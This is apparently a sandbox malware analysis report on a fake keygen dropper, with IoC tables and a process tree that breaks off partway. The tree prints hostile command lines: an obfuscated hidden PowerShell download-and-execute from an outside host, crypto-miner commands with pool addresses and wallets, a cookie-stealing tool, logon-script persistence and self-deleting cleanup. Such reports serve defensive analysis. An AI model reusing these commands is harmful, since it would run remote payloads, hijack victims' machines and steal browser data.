4024	multitimer.exe

Suspicious use of AdjustPrivilegeToken 45 IoCs

description	pid	Process
Token: SeDebugPrivilege	3100	taskkill.exe
Token: SeCreateTokenPrivilege	2528	askinstall20.exe
Token: SeAssignPrimaryTokenPrivilege	2528	askinstall20.exe
Token: SeLockMemoryPrivilege	2528	askinstall20.exe
Token: SeIncreaseQuotaPrivilege	2528	askinstall20.exe
Token: SeMachineAccountPrivilege	2528	askinstall20.exe
Token: SeTcbPrivilege	2528	askinstall20.exe
Token: SeSecurityPrivilege	2528	askinstall20.exe
Token: SeTakeOwnershipPrivilege	2528	askinstall20.exe
Token: SeLoadDriverPrivilege	2528	askinstall20.exe
Token: SeSystemProfilePrivilege	2528	askinstall20.exe
Token: SeSystemtimePrivilege	2528	askinstall20.exe
Token: SeProfSingleProcessPrivilege	2528	askinstall20.exe
Token: SeIncBasePriorityPrivilege	2528	askinstall20.exe
Token: SeCreatePagefilePrivilege	2528	askinstall20.exe
Token: SeCreatePermanentPrivilege	2528	askinstall20.exe
Token: SeBackupPrivilege	2528	askinstall20.exe
Token: SeRestorePrivilege	2528	askinstall20.exe
Token: SeShutdownPrivilege	2528	askinstall20.exe
Token: SeDebugPrivilege	2528	askinstall20.exe
Token: SeAuditPrivilege	2528	askinstall20.exe
Token: SeSystemEnvironmentPrivilege	2528	askinstall20.exe
Token: SeChangeNotifyPrivilege	2528	askinstall20.exe
Token: SeRemoteShutdownPrivilege	2528	askinstall20.exe
Token: SeUndockPrivilege	2528	askinstall20.exe
Token: SeSyncAgentPrivilege	2528	askinstall20.exe
Token: SeEnableDelegationPrivilege	2528	askinstall20.exe
Token: SeManageVolumePrivilege	2528	askinstall20.exe
Token: SeImpersonatePrivilege	2528	askinstall20.exe
Token: SeCreateGlobalPrivilege	2528	askinstall20.exe
Token: 31	2528	askinstall20.exe
Token: 32	2528	askinstall20.exe
Token: 33	2528	askinstall20.exe
Token: 34	2528	askinstall20.exe
Token: 35	2528	askinstall20.exe
Token: SeDebugPrivilege	4024	multitimer.exe
Token: SeDebugPrivilege	3100	taskkill.exe
Token: SeDebugPrivilege	3948	MicrosoftEdge.exe
Token: SeDebugPrivilege	3948	MicrosoftEdge.exe
Token: SeDebugPrivilege	3948	MicrosoftEdge.exe
Token: SeDebugPrivilege	3948	MicrosoftEdge.exe
Token: SeDebugPrivilege	4416	MicrosoftEdgeCP.exe
Token: SeDebugPrivilege	4416	MicrosoftEdgeCP.exe
Token: SeDebugPrivilege	4416	MicrosoftEdgeCP.exe
Token: SeDebugPrivilege	4416	MicrosoftEdgeCP.exe

Suspicious use of SetWindowsHookEx 5 IoCs

pid	Process
2704	setups.exe
2520	setups.tmp
3948	MicrosoftEdge.exe
4348	WScript.exe
4348	WScript.exe

Suspicious use of WriteProcessMemory 59 IoCs

description	pid	Process	procid_target
PID 580 wrote to memory of 2504	580	Hello_keygen_by_KeygenNinja.exe	79
PID 580 wrote to memory of 2504	580	Hello_keygen_by_KeygenNinja.exe	79
PID 580 wrote to memory of 2504	580	Hello_keygen_by_KeygenNinja.exe	79
PID 2504 wrote to memory of 2640	2504	cmd.exe	82
PID 2504 wrote to memory of 2640	2504	cmd.exe	82
PID 2504 wrote to memory of 2640	2504	cmd.exe	82
PID 2504 wrote to memory of 1392	2504	cmd.exe	84
PID 2504 wrote to memory of 1392	2504	cmd.exe	84
PID 2504 wrote to memory of 1392	2504	cmd.exe	84
PID 2504 wrote to memory of 1148	2504	cmd.exe	83
PID 2504 wrote to memory of 1148	2504	cmd.exe	83
PID 2504 wrote to memory of 1148	2504	cmd.exe	83
PID 2504 wrote to memory of 3872	2504	cmd.exe	85
PID 2504 wrote to memory of 3872	2504	cmd.exe	85
PID 2504 wrote to memory of 3872	2504	cmd.exe	85
PID 2640 wrote to memory of 3328	2640	keygen-pr.exe	86
PID 2640 wrote to memory of 3328	2640	keygen-pr.exe	86
PID 2640 wrote to memory of 3328	2640	keygen-pr.exe	86
PID 3872 wrote to memory of 3100	3872	keygen-step-4.exe	99
PID 3872 wrote to memory of 3100	3872	keygen-step-4.exe	99
PID 1148 wrote to memory of 3152	1148	keygen-step-3.exe	88
PID 1148 wrote to memory of 3152	1148	keygen-step-3.exe	88
PID 1148 wrote to memory of 3152	1148	keygen-step-3.exe	88
PID 3328 wrote to memory of 2344	3328	key.exe	90
PID 3328 wrote to memory of 2344	3328	key.exe	90
PID 3328 wrote to memory of 2344	3328	key.exe	90
PID 3152 wrote to memory of 804	3152	cmd.exe	91
PID 3152 wrote to memory of 804	3152	cmd.exe	91
PID 3152 wrote to memory of 804	3152	cmd.exe	91
PID 3100 wrote to memory of 4024	3100	taskkill.exe	92
PID 3100 wrote to memory of 4024	3100	taskkill.exe	92
PID 3100 wrote to memory of 2704	3100	taskkill.exe	93
PID 3100 wrote to memory of 2704	3100	taskkill.exe	93
PID 3100 wrote to memory of 2704	3100	taskkill.exe	93
PID 3872 wrote to memory of 2528	3872	keygen-step-4.exe	94
PID 3872 wrote to memory of 2528	3872	keygen-step-4.exe	94
PID 3872 wrote to memory of 2528	3872	keygen-step-4.exe	94
PID 2704 wrote to memory of 2520	2704	setups.exe	95
PID 2704 wrote to memory of 2520	2704	setups.exe	95
PID 2704 wrote to memory of 2520	2704	setups.exe	95
PID 2528 wrote to memory of 2596	2528	askinstall20.exe	97
PID 2528 wrote to memory of 2596	2528	askinstall20.exe	97
PID 2528 wrote to memory of 2596	2528	askinstall20.exe	97
PID 2596 wrote to memory of 3100	2596	cmd.exe	99
PID 2596 wrote to memory of 3100	2596	cmd.exe	99
PID 2596 wrote to memory of 3100	2596	cmd.exe	99
PID 4024 wrote to memory of 4512	4024	multitimer.exe	105
PID 4024 wrote to memory of 4512	4024	multitimer.exe	105
PID 3872 wrote to memory of 4560	3872	keygen-step-4.exe	106
PID 3872 wrote to memory of 4560	3872	keygen-step-4.exe	106
PID 3872 wrote to memory of 4560	3872	keygen-step-4.exe	106
PID 4512 wrote to memory of 4636	4512	multitimer.exe	107
PID 4512 wrote to memory of 4636	4512	multitimer.exe	107
PID 4560 wrote to memory of 4708	4560	Full Program Features.exe	108
PID 4560 wrote to memory of 4708	4560	Full Program Features.exe	108
PID 4560 wrote to memory of 4708	4560	Full Program Features.exe	108
PID 3872 wrote to memory of 4760	3872	keygen-step-4.exe	109
PID 3872 wrote to memory of 4760	3872	keygen-step-4.exe	109
PID 3872 wrote to memory of 4760	3872	keygen-step-4.exe	109

C:\Users\Admin\AppData\Local\Temp\Hello_keygen_by_KeygenNinja.exe
"C:\Users\Admin\AppData\Local\Temp\Hello_keygen_by_KeygenNinja.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:580
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2504
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exe
    keygen-pr.exe -p83fsase3Ge
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:2640
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:3328
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat
        5⤵
        
        PID:2344
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe
    keygen-step-3.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:1148
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3152
    - - C:\Windows\SysWOW64\PING.EXE
        
        ping 1.1.1.1 -n 1 -w 3000
        5⤵
        Runs ping.exe
        
        PID:804
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exe
    keygen-step-1.exe
    3⤵
    - Executes dropped EXE
    PID:1392
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exe
    keygen-step-4.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:3872
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"
      4⤵
      PID:3100
    - - C:\Users\Admin\AppData\Local\Temp\FW7L6REZUK\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FW7L6REZUK\multitimer.exe" 0 3060197d33d91c80.94013368 0 101
        5⤵
        Executes dropped EXE
        Maps connected drives based on registry
        Drops file in Windows directory
        Enumerates system info in registry
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:4024
      - C:\Users\Admin\AppData\Local\Temp\FW7L6REZUK\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FW7L6REZUK\multitimer.exe" 1 3.1617447927.60684bf78b00c 101
        6⤵
        Executes dropped EXE
        Adds Run key to start application
        Suspicious use of WriteProcessMemory
        
        PID:4512
        
        C:\Users\Admin\AppData\Local\Temp\FW7L6REZUK\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FW7L6REZUK\multitimer.exe" 2 3.1617447927.60684bf78b00c
        7⤵
        Executes dropped EXE
        
        PID:4636
        
        C:\Users\Admin\AppData\Local\Temp\atcjohkdgqa\KiffApp1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\atcjohkdgqa\KiffApp1.exe"
        8⤵
        
        PID:4228
        
        C:\Users\Admin\AppData\Local\Temp\utnvlmx4xjj\bpbesnh3sma.exe
        
        "C:\Users\Admin\AppData\Local\Temp\utnvlmx4xjj\bpbesnh3sma.exe" /ustwo INSTALL
        8⤵
        
        PID:4208
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im "bpbesnh3sma.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\utnvlmx4xjj\bpbesnh3sma.exe" & exit
        9⤵
        
        PID:4444
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im "bpbesnh3sma.exe" /f
        10⤵
        Kills process with taskkill
        
        PID:4468
        
        C:\Users\Admin\AppData\Local\Temp\f3zupc5chc4\cpyrix.exe
        
        "C:\Users\Admin\AppData\Local\Temp\f3zupc5chc4\cpyrix.exe" /VERYSILENT
        8⤵
        
        PID:4232
        
        C:\Users\Admin\AppData\Local\Temp\p41rczejhmr\4m3o5ueyons.exe
        
        "C:\Users\Admin\AppData\Local\Temp\p41rczejhmr\4m3o5ueyons.exe"
        8⤵
        
        PID:4164
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\p41rczejhmr\4m3o5ueyons.exe"
        9⤵
        
        PID:5548
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping 1.1.1.1 -n 1 -w 3000
        10⤵
        Runs ping.exe
        
        PID:5768
        
        C:\Users\Admin\AppData\Local\Temp\iualr3mibdk\app.exe
        
        "C:\Users\Admin\AppData\Local\Temp\iualr3mibdk\app.exe" /8-23
        8⤵
        
        PID:4772
        
        C:\Users\Admin\AppData\Local\Temp\tfhn2r25ld3\vpn.exe
        
        "C:\Users\Admin\AppData\Local\Temp\tfhn2r25ld3\vpn.exe" /silent /subid=482
        8⤵
        
        PID:4484
        
        C:\Users\Admin\AppData\Local\Temp\is-OU0IG.tmp\vpn.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-OU0IG.tmp\vpn.tmp" /SL5="$2029A,15170975,270336,C:\Users\Admin\AppData\Local\Temp\tfhn2r25ld3\vpn.exe" /silent /subid=482
        9⤵
        
        PID:4544
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "
        10⤵
        
        PID:4220
        
        C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
        
        tapinstall.exe remove tap0901
        11⤵
        
        PID:2612
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "
        10⤵
        
        PID:5236
        
        C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
        
        tapinstall.exe install OemVista.inf tap0901
        11⤵
        
        PID:6516
        
        C:\Program Files (x86)\MaskVPN\mask_svc.exe
        
        "C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall
        10⤵
        
        PID:5924
        
        C:\Program Files (x86)\MaskVPN\mask_svc.exe
        
        "C:\Program Files (x86)\MaskVPN\mask_svc.exe" install
        10⤵
        
        PID:7420
        
        C:\Users\Admin\AppData\Local\Temp\qorfldtlwxe\IBInstaller_97039.exe
        
        "C:\Users\Admin\AppData\Local\Temp\qorfldtlwxe\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq
        8⤵
        
        PID:4584
        
        C:\Users\Admin\AppData\Local\Temp\is-7B9IP.tmp\IBInstaller_97039.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-7B9IP.tmp\IBInstaller_97039.tmp" /SL5="$103AE,14574917,721408,C:\Users\Admin\AppData\Local\Temp\qorfldtlwxe\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq
        9⤵
        
        PID:4336
        
        C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-IFE1C.tmp\{app}\microsoft.cab -F:* %ProgramData%
        10⤵
        
        PID:5116
        
        C:\Windows\SysWOW64\expand.exe
        
        expand C:\Users\Admin\AppData\Local\Temp\is-IFE1C.tmp\{app}\microsoft.cab -F:* C:\ProgramData
        11⤵
        
        PID:5364
        
        C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "%ProgramData%\regid.1993-06.com.microsoft\client32.exe" /f
        10⤵
        
        PID:1656
        
        C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /c start http://egypthistoricart.online/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=97039^&param=
        10⤵
        
        PID:3280
        
        C:\ProgramData\regid.1993-06.com.microsoft\client32.exe
        
        "C:\ProgramData\regid.1993-06.com.microsoft\client32.exe"
        10⤵
        
        PID:6604
        
        C:\Users\Admin\AppData\Local\Temp\k3uu4ayl5ac\3foldxvk4dw.exe
        
        "C:\Users\Admin\AppData\Local\Temp\k3uu4ayl5ac\3foldxvk4dw.exe" /VERYSILENT
        8⤵
        
        PID:4552
        
        C:\Users\Admin\AppData\Local\Temp\s5zdvdgzzpo\q2rb1vxryjw.exe
        
        "C:\Users\Admin\AppData\Local\Temp\s5zdvdgzzpo\q2rb1vxryjw.exe" /quiet SILENT=1 AF=756
        8⤵
        
        PID:4448
        
        C:\Windows\SysWOW64\msiexec.exe
        
        "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=756 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\s5zdvdgzzpo\q2rb1vxryjw.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\s5zdvdgzzpo\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1617188842 /quiet SILENT=1 AF=756 " AF="756" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912"
        9⤵
        
        PID:5196
        
        C:\Users\Admin\AppData\Local\Temp\z5tocum1zmv\Setup3310.exe
        
        "C:\Users\Admin\AppData\Local\Temp\z5tocum1zmv\Setup3310.exe" /Verysilent /subid=577
        8⤵
        
        PID:4692
        
        C:\Users\Admin\AppData\Local\Temp\0aqirtnqlpk\vict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\0aqirtnqlpk\vict.exe" /VERYSILENT /id=535
        8⤵
        
        PID:4132
    - - C:\Users\Admin\AppData\Local\Temp\2FVNOQC8ER\setups.exe
        
        "C:\Users\Admin\AppData\Local\Temp\2FVNOQC8ER\setups.exe" ll
        5⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:2704
      - C:\Users\Admin\AppData\Local\Temp\is-R7LN7.tmp\setups.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-R7LN7.tmp\setups.tmp" /SL5="$50156,635399,250368,C:\Users\Admin\AppData\Local\Temp\2FVNOQC8ER\setups.exe" ll
        6⤵
        Executes dropped EXE
        Checks computer location settings
        Loads dropped DLL
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        
        PID:2520
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe"
      4⤵
      Executes dropped EXE
      Modifies system certificate store
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2528
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c taskkill /f /im chrome.exe
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:2596
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im chrome.exe
        6⤵
        Executes dropped EXE
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:3100
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX2\Full Program Features.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX2\Full Program Features.exe"
      4⤵
      Executes dropped EXE
      Drops file in Program Files directory
      Suspicious use of WriteProcessMemory
      PID:4560
    - - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"
        5⤵
        
        PID:4708
      - C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install
        6⤵
        
        PID:4860
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"
      4⤵
      PID:4760
    - - C:\Users\Admin\AppData\Roaming\A53E.tmp.exe
        
        "C:\Users\Admin\AppData\Roaming\A53E.tmp.exe"
        5⤵
        
        PID:972
      - C:\Users\Admin\AppData\Roaming\A53E.tmp.exe
        
        "C:\Users\Admin\AppData\Roaming\A53E.tmp.exe"
        6⤵
        
        PID:4564
    - - C:\Users\Admin\AppData\Roaming\A668.tmp.exe
        
        "C:\Users\Admin\AppData\Roaming\A668.tmp.exe"
        5⤵
        
        PID:4780
      - C:\Windows\system32\msiexec.exe
        
        -P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.work@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 99999
        6⤵
        
        PID:4668
      - C:\Windows\system32\msiexec.exe
        
        -o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8 --cpu-max-threads-hint 50 -r 9999
        6⤵
        
        PID:4316
    - - C:\Users\Admin\AppData\Roaming\A7D1.tmp.exe
        
        "C:\Users\Admin\AppData\Roaming\A7D1.tmp.exe"
        5⤵
        
        PID:5072
      - C:\Windows\SysWOW64\cmd.exe
        
        /c timeout /t 3 & del /f /q C:\Users\Admin\AppData\Roaming\A7D1.tmp.exe
        6⤵
        
        PID:6600
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 3
        7⤵
        Delays execution with timeout.exe
        
        PID:6592
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"
        5⤵
        
        PID:1020
      - C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.1
        6⤵
        Runs ping.exe
        
        PID:4184
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe"
      4⤵
      PID:4784
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX2\BTRSetp.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX2\BTRSetp.exe"
      4⤵
      PID:4120
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX2\gcttt.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX2\gcttt.exe"
      4⤵
      PID:7676
    - - C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        5⤵
        
        PID:7772
    - - C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        5⤵
        
        PID:5656

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:3948

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
PID:4128

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:4348

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
PID:4416

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k SystemNetworkService
1⤵
PID:4980

C:\Users\Admin\AppData\Local\Temp\is-QT7QF.tmp\vict.tmp
"C:\Users\Admin\AppData\Local\Temp\is-QT7QF.tmp\vict.tmp" /SL5="$402C0,870426,780800,C:\Users\Admin\AppData\Local\Temp\0aqirtnqlpk\vict.exe" /VERYSILENT /id=535
1⤵
PID:4404
- C:\Users\Admin\AppData\Local\Temp\is-HSUJ8.tmp\win1host.exe
  "C:\Users\Admin\AppData\Local\Temp\is-HSUJ8.tmp\win1host.exe" 535
  2⤵
  PID:4688
- - C:\Users\Admin\AppData\Local\Temp\7Reg3bIct.exe
    "C:\Users\Admin\AppData\Local\Temp\7Reg3bIct.exe"
    3⤵
    PID:5804
  - - C:\Users\Admin\AppData\Local\Temp\7Reg3bIct.exe
      "C:\Users\Admin\AppData\Local\Temp\7Reg3bIct.exe"
      4⤵
      Modifies Internet Explorer settings
      PID:4128
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4688 -s 564
    3⤵
    - Program crash
    PID:6780

C:\Users\Admin\AppData\Local\Temp\is-I8TLU.tmp\3foldxvk4dw.tmp
"C:\Users\Admin\AppData\Local\Temp\is-I8TLU.tmp\3foldxvk4dw.tmp" /SL5="$7006A,2592217,780800,C:\Users\Admin\AppData\Local\Temp\k3uu4ayl5ac\3foldxvk4dw.exe" /VERYSILENT
1⤵
PID:3764
- C:\Users\Admin\AppData\Local\Temp\is-MG4HK.tmp\winlthsth.exe
  "C:\Users\Admin\AppData\Local\Temp\is-MG4HK.tmp\winlthsth.exe"
  2⤵
  PID:5152
- - C:\Users\Admin\AppData\Local\Temp\o49aBZSGW.exe
    "C:\Users\Admin\AppData\Local\Temp\o49aBZSGW.exe"
    3⤵
    PID:748
  - - C:\Users\Admin\AppData\Local\Temp\o49aBZSGW.exe
      "C:\Users\Admin\AppData\Local\Temp\o49aBZSGW.exe"
      4⤵
      PID:1384
- - C:\Windows\SysWOW64\cmd.exe
    cmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
    3⤵
    PID:7116
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
      4⤵
      PID:7712

C:\Users\Admin\AppData\Local\Temp\is-T0VII.tmp\Setup3310.tmp
"C:\Users\Admin\AppData\Local\Temp\is-T0VII.tmp\Setup3310.tmp" /SL5="$50294,138429,56832,C:\Users\Admin\AppData\Local\Temp\z5tocum1zmv\Setup3310.exe" /Verysilent /subid=577
1⤵
PID:4816
- C:\Users\Admin\AppData\Local\Temp\is-PDUQ0.tmp\Setup.exe
  "C:\Users\Admin\AppData\Local\Temp\is-PDUQ0.tmp\Setup.exe" /Verysilent
  2⤵
  PID:4364
- - C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\hjjgaa.exe
    "C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\hjjgaa.exe"
    3⤵
    PID:5328
  - - C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
      4⤵
      PID:4456
  - - C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
      4⤵
      PID:4320
- - C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\RunWW.exe
    "C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\RunWW.exe"
    3⤵
    PID:4632
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4632 -s 952
      4⤵
      Program crash
      PID:2256
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4632 -s 928
      4⤵
      Program crash
      PID:7212
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4632 -s 1084
      4⤵
      Program crash
      PID:7744
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4632 -s 1220
      4⤵
      Program crash
      PID:8032
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4632 -s 1264
      4⤵
      Program crash
      PID:8140
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4632 -s 1244
      4⤵
      Program crash
      PID:3936
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4632 -s 1316
      4⤵
      Program crash
      PID:7932
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4632 -s 1536
      4⤵
      Program crash
      PID:7844
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4632 -s 1504
      4⤵
      Program crash
      PID:6264
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4632 -s 1684
      4⤵
      Program crash
      PID:3832
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4632 -s 1676
      4⤵
      Program crash
      PID:7720
- - C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\jg7_7wjg.exe
    "C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\jg7_7wjg.exe"
    3⤵
    PID:4928
- - C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exe
